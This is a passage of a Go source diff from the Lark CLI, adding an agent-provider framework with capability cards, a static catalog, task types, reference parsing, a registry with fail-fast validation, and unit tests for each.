// Supports reports whether a capability is declared as supported (an unknown key
// or a nil card is treated as unsupported).
func (c *AgentCard) Supports(cap string) bool {
if c == nil {
return false
}
switch cap {
case CapArtifactDownload:
return c.Capabilities.ArtifactDownload
case CapFileInput:
return c.Capabilities.FileInput
case CapInputRequired:
return c.Capabilities.InputRequired
case CapMultiTurn:
return c.Capabilities.MultiTurn
case CapTaskCancel:
return c.Capabilities.TaskCancel
case CapTaskGet:
return c.Capabilities.TaskGet
case CapTaskList:
return c.Capabilities.TaskList
default:
return false
}
}

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@@ -0,0 +1,65 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import "testing"
func TestCardSupports(t *testing.T) {
c := &AgentCard{Capabilities: Capabilities{TaskCancel: false, MultiTurn: true}}
if c.Supports(CapTaskCancel) {
t.Error("task_cancel should not be supported")
}
if !c.Supports(CapMultiTurn) {
t.Error("multi_turn should be supported")
}
if c.Supports("nonexistent") {
t.Error("unknown capability should be treated as unsupported")
}
// nil guard branch: a nil receiver is treated as unsupported; a zero-value Capabilities is all false.
var nilCard *AgentCard
if nilCard.Supports(CapMultiTurn) {
t.Error("nil card should be treated as unsupported")
}
if (&AgentCard{}).Supports(CapMultiTurn) {
t.Error("zero-value Capabilities should be treated as unsupported")
}
// Each capability constant must map to its own struct field (the switch has no gaps or mismatches).
all := &AgentCard{Capabilities: Capabilities{
ArtifactDownload: true, FileInput: true, InputRequired: true,
MultiTurn: true, TaskCancel: true, TaskGet: true, TaskList: true,
}}
for _, k := range []string{
CapArtifactDownload, CapFileInput, CapInputRequired,
CapMultiTurn, CapTaskCancel, CapTaskGet, CapTaskList,
} {
if !all.Supports(k) {
t.Errorf("Supports(%q) should be true when all Capabilities are true", k)
}
}
}
// TestNewCardFillsRegistrationFields pins that NewCard pre-fills every
// registration-known field and panics on an unregistered scheme.
func TestNewCardFillsRegistrationFields(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
info := testInfo("nc", okFactory())
info.Identities = []IdentitySpec{{Type: IdentityBot, Precondition: "需要白名单"}}
Register("nc", info)
card := NewCard("nc", "agt_1")
if card.Provider != "nc" || card.AgentID != "agt_1" {
t.Fatalf("provider/agent_id: %+v", card)
}
if card.ProviderLabel != info.Label || card.AgentIDSource != info.AgentIDSource {
t.Fatalf("registration metadata should be pre-filled: %+v", card)
}
if len(card.Identity) != 1 || card.Identity[0].Type != IdentityBot {
t.Fatalf("identity should come from registration info: %+v", card.Identity)
}
if card.Parameters == nil || len(card.Parameters) != 0 {
t.Fatalf("parameters should be empty but non-nil (always emit []): %#v", card.Parameters)
}
mustPanic(t, "unregistered scheme", func() { NewCard("ghost", "agt_1") })
}

90
internal/agent/catalog.go Normal file
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// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"sort"
"github.com/larksuite/cli/errs"
)
// CatalogEntry is the provider-neutral description of one predefined agent in a
// catalog-type provider. It holds only descriptive fields the framework can
// consume (enumeration / Card metadata); capabilities are NOT declared here —
// they are derived from which Provider func fields the integrator's Factory
// wires for this agent (see agent/example). A provider's private business
// fields (such as the execution backend it points to) are maintained alongside
// in the integrator's own package and do not enter framework types.
type CatalogEntry struct {
ID string
Name string
Description string
}
// StaticCatalog carries the common boilerplate of a catalog-type provider:
// catalog enumeration (the ListAgents field), per-agent Card metadata (Describe
// returns the entry's Name/Description), and a typed validation error for
// unknown ids. Capabilities are derived by the framework from the Provider
// fields the integrator's Factory wires, not stored here. Business differences
// (such as the execution backend) are composed by the provider itself on the
// outer layer. It is read-only after construction and safe for concurrent use.
type StaticCatalog struct {
scheme string
entries map[string]CatalogEntry
}
// NewStaticCatalog constructs a static catalog. A duplicate entry ID is an
// integrator coding error and panics fail-fast (aligned with the Register convention).
func NewStaticCatalog(scheme string, entries []CatalogEntry) *StaticCatalog {
m := make(map[string]CatalogEntry, len(entries))
for _, e := range entries {
if _, dup := m[e.ID]; dup {
panic("agent: StaticCatalog duplicate entry ID for scheme " + scheme + ": " + e.ID)
}
m[e.ID] = e
}
return &StaticCatalog{scheme: scheme, entries: m}
}
// ListAgents enumerates the catalog (Discoverer semantics), sorted by AgentRef
// to guarantee stable output.
func (c *StaticCatalog) ListAgents(ctx context.Context) ([]AgentSummary, error) {
out := make([]AgentSummary, 0, len(c.entries))
for _, e := range c.entries {
out = append(out, AgentSummary{
AgentRef: c.scheme + ":" + e.ID,
Name: e.Name,
Description: e.Description,
})
}
sort.Slice(out, func(i, j int) bool { return out[i].AgentRef < out[j].AgentRef })
return out, nil
}
// Describe returns the per-agent Card metadata (Name/Description) for agentID,
// suitable as a Provider.Describe implementation: it validates the id (an
// unknown id returns the typed error from Lookup) and leaves capability
// derivation to the framework. Parameters/Skills are left empty; a provider
// with declared parameters composes them on top.
func (c *StaticCatalog) Describe(agentID string) (*CardInfo, error) {
e, err := c.Lookup(agentID)
if err != nil {
return nil, err
}
return &CardInfo{Name: e.Name, Description: e.Description}, nil
}
// Lookup fetches a catalog entry by id. An unknown id returns a typed
// validation/invalid_argument error (exit 2) whose hint points to
// `agent list <scheme>`, so a provider need not define its own unknown-agent error.
func (c *StaticCatalog) Lookup(agentID string) (CatalogEntry, error) {
e, ok := c.entries[agentID]
if !ok {
return CatalogEntry{}, errs.NewValidationError(errs.SubtypeInvalidArgument,
"未知的 %s agent '%s'", c.scheme, agentID).
WithHint("运行 lark-cli agent list %s 查看可用 agent", c.scheme)
}
return e, nil
}

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@@ -0,0 +1,99 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"errors"
"reflect"
"testing"
"github.com/larksuite/cli/errs"
)
// testCatalogEntries is declared out of order to verify ListAgents sorting stability.
func testCatalogEntries() []CatalogEntry {
return []CatalogEntry{
{ID: "zeta", Name: "Zeta 助手", Description: "z desc"},
{ID: "alpha", Name: "Alpha 助手", Description: "a desc"},
}
}
// TestStaticCatalogListAgentsSorted asserts the enumeration is sorted by AgentRef
// and that two consecutive results are DeepEqual (stable sort, the same contract
// asserted by agenttest discovery).
func TestStaticCatalogListAgentsSorted(t *testing.T) {
c := NewStaticCatalog("cattest", testCatalogEntries())
got, err := c.ListAgents(context.Background())
if err != nil {
t.Fatal(err)
}
want := []AgentSummary{
{AgentRef: "cattest:alpha", Name: "Alpha 助手", Description: "a desc"},
{AgentRef: "cattest:zeta", Name: "Zeta 助手", Description: "z desc"},
}
if !reflect.DeepEqual(got, want) {
t.Fatalf("ListAgents should be sorted by AgentRef, want %+v got %+v", want, got)
}
got2, err := c.ListAgents(context.Background())
if err != nil {
t.Fatal(err)
}
if !reflect.DeepEqual(got, got2) {
t.Fatalf("two consecutive ListAgents calls should be DeepEqual, got\n%+v\nvs\n%+v", got, got2)
}
}
// TestStaticCatalogDescribe asserts Describe returns the entry's per-agent
// Name/Description (the framework fills registration fields and derives
// capabilities from the wired Provider fields, so those are not Describe's job).
func TestStaticCatalogDescribe(t *testing.T) {
c := NewStaticCatalog("cattest", testCatalogEntries())
info, err := c.Describe("alpha")
if err != nil {
t.Fatal(err)
}
if info.Name != "Alpha 助手" || info.Description != "a desc" {
t.Fatalf("Describe should return the entry Name/Description, got %+v", info)
}
// Describe carries no capabilities/parameters — those are the framework's job.
if len(info.Parameters) != 0 || len(info.Skills) != 0 {
t.Fatalf("Describe should not populate Parameters/Skills, got %+v", info)
}
}
// TestStaticCatalogUnknownID asserts Lookup / Card return a typed
// validation/invalid_argument error for an unknown id (exit 2 rather than
// internal/exit 5), with the hint pointing to `agent list <scheme>`.
func TestStaticCatalogUnknownID(t *testing.T) {
c := NewStaticCatalog("cattest", testCatalogEntries())
_, err := c.Lookup("nonexistent")
if err == nil {
t.Fatal("unknown id should return an error")
}
var ve *errs.ValidationError
if !errors.As(err, &ve) {
t.Fatalf("unknown id should be an *errs.ValidationError, got %T: %v", err, err)
}
if ve.Subtype != errs.SubtypeInvalidArgument {
t.Fatalf("subtype should be invalid_argument, got %q", ve.Subtype)
}
if want := "未知的 cattest agent 'nonexistent'"; ve.Message != want {
t.Fatalf("message should be %q, got %q", want, ve.Message)
}
if want := "运行 lark-cli agent list cattest 查看可用 agent"; ve.Hint != want {
t.Fatalf("hint should be %q, got %q", want, ve.Hint)
}
// Describe goes through the same Lookup path.
if _, err := c.Describe("nonexistent"); !errors.As(err, &ve) {
t.Fatalf("Describe with an unknown id should return the same typed error, got %v", err)
}
}
// TestStaticCatalogDuplicateIDPanic asserts a duplicate entry ID triggers a
// fail-fast panic (aligned with the Register convention).
func TestStaticCatalogDuplicateIDPanic(t *testing.T) {
entries := []CatalogEntry{{ID: "a"}, {ID: "a"}}
mustPanic(t, "duplicate entry ID", func() { NewStaticCatalog("cattest", entries) })
}

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@@ -0,0 +1,94 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
// AgentTask is the unified structure that task-family commands put into output.Envelope.Data.
type AgentTask struct {
TaskID string `json:"task_id"`
ContextID string `json:"context_id,omitempty"`
State TaskState `json:"state"`
IsTerminal bool `json:"is_terminal"`
Messages []Message `json:"messages,omitempty"`
Artifacts []Artifact `json:"artifacts,omitempty"`
InputRequired *InputRequired `json:"input_required,omitempty"`
}
// Message is one turn of an agent or user message, composed of several Parts.
type Message struct {
Role string `json:"role"` // "agent" | "user"
Parts []Part `json:"parts"`
}
// Part is one fragment of a message: text, file, or structured data.
type Part struct {
Type string `json:"type"` // "text" | "file" | "data"
Text string `json:"text,omitempty"`
// File/Data pass-through: file uses URL/Name, data uses Data.
Name string `json:"name,omitempty"`
URL string `json:"url,omitempty"`
Data interface{} `json:"data,omitempty"`
}
// Artifact is one artifact produced by a task (file / inline text), downloadable
// via URL.
//
// Its fields align with A2A's Artifact/FilePart, but only what a provider can
// truly deliver is populated (e.g. example only provides ID + Kind — the
// coarse-grained kind at the GetTask stage — plus Name/Mime at the download
// stage). Mime/Description/Size are placeholders under A2A semantics; if a
// provider does not yet supply them they are omitted via omitempty and lit up
// only once the provider can fill them, rather than creating empty shell fields
// that cannot be filled.
type Artifact struct {
ID string `json:"id"`
Kind string `json:"kind,omitempty"` // coarse-grained kind (image/file/...), a type hint before download
Name string `json:"name,omitempty"` // file name (with extension), helps choose the -o save name
Mime string `json:"mime,omitempty"` // content type (image/png…), empty if the provider does not supply it
Description string `json:"description,omitempty"`
Size int64 `json:"size,omitempty"` // byte count, 0 if the provider does not supply it
URL string `json:"url,omitempty"`
Text string `json:"text,omitempty"`
}
// InputRequired describes the input a task requests from the user while in the
// input_required state.
type InputRequired struct {
Prompt string `json:"prompt"`
Options []string `json:"options,omitempty"`
}
// TaskSummary is a single task summary in the task list output.
type TaskSummary struct {
TaskID string `json:"task_id"`
ContextID string `json:"context_id,omitempty"`
State TaskState `json:"state"`
IsTerminal bool `json:"is_terminal"`
}
// ContextSummary is a single context summary in the context list output.
type ContextSummary struct {
ContextID string `json:"context_id"`
CreatedAt string `json:"created_at,omitempty"`
Title string `json:"title,omitempty"`
}
// ContextDetail is the context detail in the context get output (including its task list).
type ContextDetail struct {
ContextID string `json:"context_id"`
CreatedAt string `json:"created_at,omitempty"`
Title string `json:"title,omitempty"`
Tasks []TaskSummary `json:"tasks,omitempty"`
}
// ArtifactData is the return value of DownloadArtifact: the URL type gives URL,
// the inline type gives Bytes. Name is the server-suggested file name (echoed
// back only as a suggested_name reference for the command layer); it is
// untrusted input and must never participate in constructing the local save
// path — the save path is always determined by -o/SafeOutputPath.
type ArtifactData struct {
Name string
Mime string
URL string
Bytes []byte
}

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@@ -0,0 +1,28 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"encoding/json"
"testing"
)
func TestAgentTaskJSON(t *testing.T) {
at := AgentTask{TaskID: "chat_1", ContextID: "sess_1", State: StateInputRequired,
IsTerminal: false,
InputRequired: &InputRequired{Prompt: "按大区还是品类拆?", Options: []string{"region", "category"}}}
b, _ := json.Marshal(at)
var m map[string]interface{}
_ = json.Unmarshal(b, &m)
if m["state"] != "input_required" {
t.Errorf("state=%v", m["state"])
}
if _, ok := m["input_required"]; !ok {
t.Error("input_required should appear in the input_required state")
}
// unset artifacts should be omitted via omitempty
if _, ok := m["artifacts"]; ok {
t.Error("artifacts should be omitted via omitempty")
}
}

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@@ -0,0 +1,89 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import "context"
// SendInput is the input to send (Params has already passed Card validation).
type SendInput struct {
Text string
Files []string
Params map[string]string
ContextID string
TaskID string
}
// CardInfo is the per-agent descriptive metadata a provider supplies for its
// Card (everything the framework cannot fill from registration data or derive
// from capabilities): the display Name/Description, declared input Parameters,
// and Skills. It is returned by Provider.Describe.
type CardInfo struct {
Name string
Description string
Parameters []CardParam
Skills []CardSkill
}
// Provider is a remote agent adapter: it translates the unified commands into a
// specific vendor's OAPI. It is a struct of function fields rather than a fat
// interface, mirroring the events KeyDefinition / shortcuts Shortcut convention:
// a provider fills only the capabilities it supports, and a nil optional field
// means "unsupported" — the command layer gates on it and returns a unified
// unsupported_capability error before any network access, so a provider never
// writes capability-refusal code itself. The Card capability matrix is derived
// by the framework from which fields are non-nil (see BuildCard), so declaration
// and behavior are single-sourced and cannot drift.
//
// Because a Provider is constructed per (deps, agentID) by its Factory, a
// catalog provider whose agents differ in capability wires different fields per
// agentID (see agent/example) — capability is expressed as code, not a
// hand-maintained bool matrix.
type Provider struct {
// ── Core (Register validates both non-nil for every provider) ──
// Send sends one message, starting a new task or continuing an existing one.
Send func(ctx context.Context, in SendInput) (*AgentTask, error)
// GetTask queries a single task's state and artifacts.
GetTask func(ctx context.Context, taskID string) (*AgentTask, error)
// ── Optional capabilities (nil = unsupported; framework gates) ──
// ListTasks lists tasks, optionally filtered by contextID (empty = no filter).
// nil ⇒ card task_list=false.
ListTasks func(ctx context.Context, contextID string) ([]TaskSummary, error)
// CancelTask cancels (interrupts) a task. nil ⇒ card task_cancel=false.
CancelTask func(ctx context.Context, taskID string) error
// ListContexts lists multi-turn contexts. nil ⇒ card multi_turn=false (the
// multi_turn capability is derived from this, the enumeration entry point).
ListContexts func(ctx context.Context) ([]ContextSummary, error)
// GetContext returns a single context's detail. nil ⇒ context get unsupported.
GetContext func(ctx context.Context, ctxID string) (*ContextDetail, error)
// DeleteContext deletes a context (destructive). nil ⇒ context delete unsupported.
DeleteContext func(ctx context.Context, ctxID string) error
// DownloadArtifact fetches artifact data: the URL type returns URL, the inline
// type returns Bytes. nil ⇒ card artifact_download=false.
DownloadArtifact func(ctx context.Context, taskID, artifactID string) (*ArtifactData, error)
// ListAgents enumerates the provider's own agents (catalog discovery). nil ⇒
// `agent list <scheme>` reports the provider is not enumerable. A KindCatalog
// provider must wire it (asserted at Register time).
ListAgents func(ctx context.Context) ([]AgentSummary, error)
// ── Optional descriptive metadata ──
// Describe supplies the per-agent Card metadata (Name/Description/Parameters/
// Skills) and is the place to validate an unknown agent_id (return a typed
// error). nil ⇒ the card carries only registration fields + derived
// capabilities. Called at card-display time (may hit the network for an
// instance provider that fetches its card remotely).
Describe func(ctx context.Context) (*CardInfo, error)
// ── Behavioral flags (not derivable from method presence) ──
// FileInput reports whether Send accepts SendInput.Files (drives card
// file_input and the --file off-machine-upload confirmation gate).
FileInput bool
// InputRequired reports whether the agent may pause a task in the
// input_required state awaiting more input (drives card input_required).
InputRequired bool
}

29
internal/agent/ref.go Normal file
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@@ -0,0 +1,29 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"errors"
"strings"
)
// ErrInvalidRef is the sentinel error for a malformed agent_ref (wrapped into a
// validation error by the caller).
var ErrInvalidRef = errors.New("agent_ref 格式应为 <provider>:<agent_id>")
// Ref is the identifier addressing a remote agent: <scheme>:<agent_id>, e.g. example:echo.
type Ref struct {
Scheme string
AgentID string
}
// ParseRef parses a ref string. On a malformed format it returns ErrInvalidRef
// (wrapped into a validation error by the caller).
func ParseRef(s string) (Ref, error) {
parts := strings.SplitN(s, ":", 2)
if len(parts) != 2 || parts[0] == "" || parts[1] == "" || strings.Contains(parts[1], ":") {
return Ref{}, ErrInvalidRef
}
return Ref{Scheme: parts[0], AgentID: parts[1]}, nil
}

View File

@@ -0,0 +1,24 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"errors"
"testing"
)
func TestParseRef(t *testing.T) {
r, err := ParseRef("example:agt_xxx")
if err != nil || r.Scheme != "example" || r.AgentID != "agt_xxx" {
t.Fatalf("got %+v err=%v", r, err)
}
}
func TestParseRefErrors(t *testing.T) {
for _, s := range []string{"", "example", "example:", ":agt", "example:agt:extra"} {
if _, err := ParseRef(s); !errors.Is(err, ErrInvalidRef) {
t.Errorf("ParseRef(%q) should return ErrInvalidRef, got err=%v", s, err)
}
}
}

182
internal/agent/registry.go Normal file
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@@ -0,0 +1,182 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"fmt"
"sort"
"strings"
"github.com/larksuite/cli/internal/client"
"github.com/larksuite/cli/internal/core"
)
// Deps are the dependencies a provider factory needs (injected by the command
// layer to avoid internal/agent depending on cmd).
type Deps struct {
Client *client.APIClient
As core.Identity
}
// Factory constructs a Provider from an agentID plus dependencies.
type Factory func(deps Deps, agentID string) (*Provider, error)
// ProviderKind is the closed set of provider forms (validated at Register time
// to guard against cast typos).
type ProviderKind string
const (
// KindCatalog is the catalog type: the full agent set is known at
// registration time, and it must wire Provider.ListAgents.
KindCatalog ProviderKind = "catalog"
// KindInstance is the instance type: agents are created by users on the
// platform and cannot be enumerated by the CLI in advance.
KindInstance ProviderKind = "instance"
)
// ProviderInfo is a provider's registration contract: metadata beyond Factory
// consumed by platform capabilities such as `agent list`, card synthesis, and
// scope preflight. Everything except RequiredScopes is required (Register
// validates fail-fast).
type ProviderInfo struct {
// Factory constructs the Provider for this scheme. Factory must accept
// zero-value Deps and have no side effects during construction — this
// contract is enforced at registration time by Register's zero-value Deps
// probe (a violation panics), and agent list also constructs a probe
// instance with empty Deps to read the ListAgents capability
// (cmd/agent/list.go probeDiscoverer). Because the probe passes zero Deps and
// empty agentID, capability wiring must not depend on either.
Factory Factory
// Label is the user-facing provider name.
Label string
// AgentRefFormat is the written format of agent_ref, e.g. "example:<agent_id>";
// it must be prefixed with "<scheme>:" (validated by Register).
AgentRefFormat string
// AgentIDSource tells the user where to obtain the agent_id (key information
// for AI-guided onboarding).
AgentIDSource string
// Kind is the provider form: KindCatalog (catalog type) or KindInstance
// (instance type). Catalog types must wire Provider.ListAgents (asserted at
// Register time).
Kind ProviderKind
// RequiredScopes is the full (flat) set of scopes needed by any real API
// call this provider makes; preflight is all-or-nothing.
RequiredScopes []string
// Identities declares the supported calling identities and their
// preconditions; non-empty and Type ∈ {user, bot} (validated by Register).
Identities []IdentitySpec
}
var providerRegistry = map[string]ProviderInfo{}
// Register is called by each adapter package in its init() to register itself
// (exported so adapter packages like example can call it across packages).
// Missing / invalid metadata is an integrator coding error and panics fail-fast
// (including duplicate registration, aligned with the sql.Register convention).
// At registration time it also constructs a Provider once via a zero-value Deps
// probe: Factory must accept zero-value Deps (returning an error panics), and a
// KindCatalog instance must implement Discoverer.
func Register(scheme string, info ProviderInfo) {
if scheme == "" {
panic("agent: provider registration with empty scheme")
}
if _, dup := providerRegistry[scheme]; dup {
panic("agent: Register called twice for scheme: " + scheme)
}
switch {
case info.Factory == nil:
panic("agent: provider registration missing Factory: " + scheme)
case info.Label == "":
panic("agent: provider registration missing Label: " + scheme)
case info.AgentRefFormat == "":
panic("agent: provider registration missing AgentRefFormat: " + scheme)
case !strings.HasPrefix(info.AgentRefFormat, scheme+":"):
panic("agent: provider registration AgentRefFormat must start with \"" + scheme + ":\": " + scheme + ", got: " + info.AgentRefFormat)
case info.AgentIDSource == "":
panic("agent: provider registration missing AgentIDSource: " + scheme)
case info.Kind != KindCatalog && info.Kind != KindInstance:
panic("agent: provider registration invalid Kind (want catalog|instance): " + scheme + ", got: " + string(info.Kind))
case len(info.Identities) == 0:
panic("agent: provider registration missing Identities: " + scheme)
}
for _, id := range info.Identities {
if id.Type != IdentityUser && id.Type != IdentityBot {
panic("agent: provider registration invalid Identity Type (want user|bot): " + scheme + ", got: " + string(id.Type))
}
}
// Zero-value Deps construction probe: turns the Factory contract (see the
// ProviderInfo.Factory comment) from a pure convention into a
// registration-time enforcement, preventing capabilities from silently
// disappearing on the agent list probing path.
p, err := info.Factory(Deps{}, "")
if err != nil {
panic("agent: provider factory must accept zero-value Deps: " + scheme + ", got error: " + err.Error())
}
if p == nil {
panic("agent: provider factory returned nil Provider: " + scheme)
}
// Core capabilities are mandatory for every provider — a provider you cannot
// send to or read a task back from is not usable. The command layer relies on
// these never being nil (no nil-check before dispatch), so enforce it here.
switch {
case p.Send == nil:
panic("agent: provider missing core Send: " + scheme)
case p.GetTask == nil:
panic("agent: provider missing core GetTask: " + scheme)
}
// A catalog provider's full agent set is known offline, so it must be
// enumerable (wire ListAgents); an instance provider need not be.
if info.Kind == KindCatalog && p.ListAgents == nil {
panic("agent: catalog provider must wire ListAgents: " + scheme)
}
providerRegistry[scheme] = info
}
// Info returns the registration value for a scheme (the struct is returned by
// value, but its slice fields share the underlying array with the registry, so
// the caller must treat them as read-only); returns ok=false if not registered.
func Info(scheme string) (ProviderInfo, bool) {
info, ok := providerRegistry[scheme]
return info, ok
}
// providerFor fetches the factory for a scheme and constructs a Provider. An
// unknown scheme returns an error listing the available options.
func providerFor(scheme, agentID string, deps Deps) (*Provider, error) {
info, ok := providerRegistry[scheme]
if !ok {
return nil, fmt.Errorf("未知的 agent provider '%s',当前支持: %s", scheme, KnownSchemes())
}
return info.Factory(deps, agentID)
}
// KnownSchemes returns a comma-separated list of registered schemes (stably
// sorted), or "(none)" when empty (exported: cmd/agent's unknown-scheme message
// reuses the same implementation to avoid double-sourcing).
func KnownSchemes() string {
s := RegisteredSchemes()
if len(s) == 0 {
return "(none)"
}
return strings.Join(s, ", ")
}
// Resolve parses a ref and constructs the corresponding Provider (command-layer entry point).
func Resolve(ref string, deps Deps) (*Provider, error) {
r, err := ParseRef(ref)
if err != nil {
return nil, err
}
return providerFor(r.Scheme, r.AgentID, deps)
}
// RegisteredSchemes lets `agent list` enumerate registered providers (exported for cmd/agent).
func RegisteredSchemes() []string {
s := make([]string, 0, len(providerRegistry))
for k := range providerRegistry {
s = append(s, k)
}
sort.Strings(s)
return s
}

View File

@@ -0,0 +1,275 @@
// Copyright (c) 2026 Lark Technologies Pte. Ltd.
// SPDX-License-Identifier: MIT
package agent
import (
"context"
"errors"
"reflect"
"strings"
"testing"
)
// swapRegistry replaces the global providerRegistry with the given map (restored
// automatically via t.Cleanup), for test isolation. It swaps the global variable
// without a lock, so callers must not use t.Parallel.
func swapRegistry(t *testing.T, m map[string]ProviderInfo) {
t.Helper()
saved := providerRegistry
providerRegistry = m
t.Cleanup(func() { providerRegistry = saved })
}
// okProvider is a minimal valid provider: it wires the two mandatory core fields
// (Send/GetTask) so it passes Register's zero-Deps probe. Tests that need extra
// capabilities set the fields on the returned struct.
func okProvider() *Provider {
return &Provider{
Send: func(context.Context, SendInput) (*AgentTask, error) { return nil, nil },
GetTask: func(context.Context, string) (*AgentTask, error) { return nil, nil },
}
}
// okFactory returns a Factory yielding okProvider — the default for cases that
// only care about metadata/registry behavior, not capabilities.
func okFactory() Factory {
return func(Deps, string) (*Provider, error) { return okProvider(), nil }
}
// testInfo builds a minimal ProviderInfo that passes Register validation
// (AgentRefFormat is generated from the scheme so it satisfies the prefix check),
// reused by cases that only care about the Factory.
func testInfo(scheme string, f Factory) ProviderInfo {
return ProviderInfo{
Factory: f,
Label: "test provider",
AgentRefFormat: scheme + ":<agent_id>",
AgentIDSource: "test source",
Kind: KindInstance,
Identities: []IdentitySpec{{Type: IdentityUser}},
}
}
// mustPanic asserts that fn panics and the message contains wantMsg.
func mustPanic(t *testing.T, wantMsg string, fn func()) {
t.Helper()
defer func() {
r := recover()
if r == nil {
t.Fatalf("should panic (want message containing %q)", wantMsg)
}
msg, _ := r.(string)
if !strings.Contains(msg, wantMsg) {
t.Fatalf("panic message should contain %q, got %q", wantMsg, msg)
}
}()
fn()
}
// TestRegisterPanicBranches table-drives the Register fail-fast panic branches
// on metadata fields: missing Factory / Label / AgentRefFormat / AgentIDSource /
// Identities, an invalid Kind, an invalid Identity Type, and an AgentRefFormat
// that does not start with "<scheme>:" (panic messages must carry the actual
// offending value). Metadata validation runs before the probe, so a valid
// okFactory keeps the probe from firing first.
func TestRegisterPanicBranches(t *testing.T) {
cases := []struct {
name string
mutate func(info *ProviderInfo)
wantMsg string
}{
{"missing Factory", func(info *ProviderInfo) { info.Factory = nil }, "missing Factory"},
{"missing Label", func(info *ProviderInfo) { info.Label = "" }, "missing Label"},
{"missing AgentRefFormat", func(info *ProviderInfo) { info.AgentRefFormat = "" }, "missing AgentRefFormat"},
{"missing AgentIDSource", func(info *ProviderInfo) { info.AgentIDSource = "" }, "missing AgentIDSource"},
{"invalid Kind", func(info *ProviderInfo) { info.Kind = "weird" }, "got: weird"},
{"missing Identities", func(info *ProviderInfo) { info.Identities = nil }, "missing Identities"},
{"invalid Identity Type", func(info *ProviderInfo) {
info.Identities = []IdentitySpec{{Type: "robot"}}
}, "got: robot"},
{"AgentRefFormat wrong prefix", func(info *ProviderInfo) {
info.AgentRefFormat = "other:<agent_id>"
}, "must start with \"bad:\""},
}
for _, tc := range cases {
t.Run(tc.name, func(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
info := testInfo("bad", okFactory())
tc.mutate(&info)
mustPanic(t, tc.wantMsg, func() { Register("bad", info) })
})
}
}
// TestRegisterEmptyScheme pins the empty-scheme fail-fast branch.
func TestRegisterEmptyScheme(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
mustPanic(t, "empty scheme", func() { Register("", testInfo("", okFactory())) })
}
// TestRegisterDuplicateScheme pins the sql.Register-style dup panic.
func TestRegisterDuplicateScheme(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
Register("dup", testInfo("dup", okFactory()))
mustPanic(t, "called twice for scheme: dup", func() { Register("dup", testInfo("dup", okFactory())) })
}
// TestRegisterFactoryZeroDepsProbe pins the registration-time zero-Deps probe:
// a factory erroring under zero-value Deps is a contract violation and panics.
func TestRegisterFactoryZeroDepsProbe(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
bad := func(Deps, string) (*Provider, error) { return nil, errors.New("need client") }
mustPanic(t, "must accept zero-value Deps", func() { Register("zd", testInfo("zd", bad)) })
}
// TestRegisterNilProvider pins the probe's nil-Provider branch.
func TestRegisterNilProvider(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
nilP := func(Deps, string) (*Provider, error) { return nil, nil }
mustPanic(t, "returned nil Provider", func() { Register("np", testInfo("np", nilP)) })
}
// TestRegisterMissingCore pins that the mandatory core fields are enforced at
// registration: a provider missing Send or GetTask panics fail-fast.
func TestRegisterMissingCore(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
noSend := func(Deps, string) (*Provider, error) {
return &Provider{GetTask: func(context.Context, string) (*AgentTask, error) { return nil, nil }}, nil
}
mustPanic(t, "missing core Send", func() { Register("ns", testInfo("ns", noSend)) })
swapRegistry(t, map[string]ProviderInfo{})
noGet := func(Deps, string) (*Provider, error) {
return &Provider{Send: func(context.Context, SendInput) (*AgentTask, error) { return nil, nil }}, nil
}
mustPanic(t, "missing core GetTask", func() { Register("ng", testInfo("ng", noGet)) })
}
// TestRegisterCatalogRequiresListAgents pins the catalog-archetype MUST:
// a KindCatalog provider whose probe instance does not wire ListAgents panics.
// The factory wires the core fields so the panic is specifically about ListAgents
// (not a missing-core panic firing first).
func TestRegisterCatalogRequiresListAgents(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
info := testInfo("cat", okFactory()) // okProvider wires Send/GetTask but not ListAgents
info.Kind = KindCatalog
mustPanic(t, "must wire ListAgents", func() { Register("cat", info) })
}
func TestInfoReturnsRegisteredMetadata(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
Register("t1", ProviderInfo{
Factory: okFactory(),
Label: "测试 provider",
AgentRefFormat: "t1:<agent_id>",
AgentIDSource: "在 T1 控制台获取",
Kind: KindInstance,
RequiredScopes: []string{"t1:chat:write"},
Identities: []IdentitySpec{{Type: IdentityUser}},
})
info, ok := Info("t1")
if !ok || info.Label != "测试 provider" || info.Kind != KindInstance {
t.Fatalf("Info(t1) = %+v, %v", info, ok)
}
if _, ok := Info("nonexistent"); ok {
t.Fatal("Info(nonexistent) should return ok=false")
}
}
func TestRegistryUnknownScheme(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
// unknown scheme: the factory is never called, so deps value is irrelevant; use zero-value Deps{}.
_, err := providerFor("nosuch", "agt_x", Deps{})
if err == nil {
t.Fatal("unknown scheme should return an error")
}
}
func TestRegistryKnownScheme(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
// The factory passes the zero-value Deps probe (empty agentID → a valid
// provider) and only errors on a real construction, staying compatible with
// the registration-time probe.
Register("stub", testInfo("stub", func(f Deps, agentID string) (*Provider, error) {
if agentID == "" {
return okProvider(), nil
}
return nil, errors.New("stub called")
}))
_, err := providerFor("stub", "agt_x", Deps{})
if err == nil || err.Error() != "stub called" {
t.Fatalf("should reach the stub factory, got %v", err)
}
}
func TestKnownSchemesEmpty(t *testing.T) {
swapRegistry(t, map[string]ProviderInfo{})
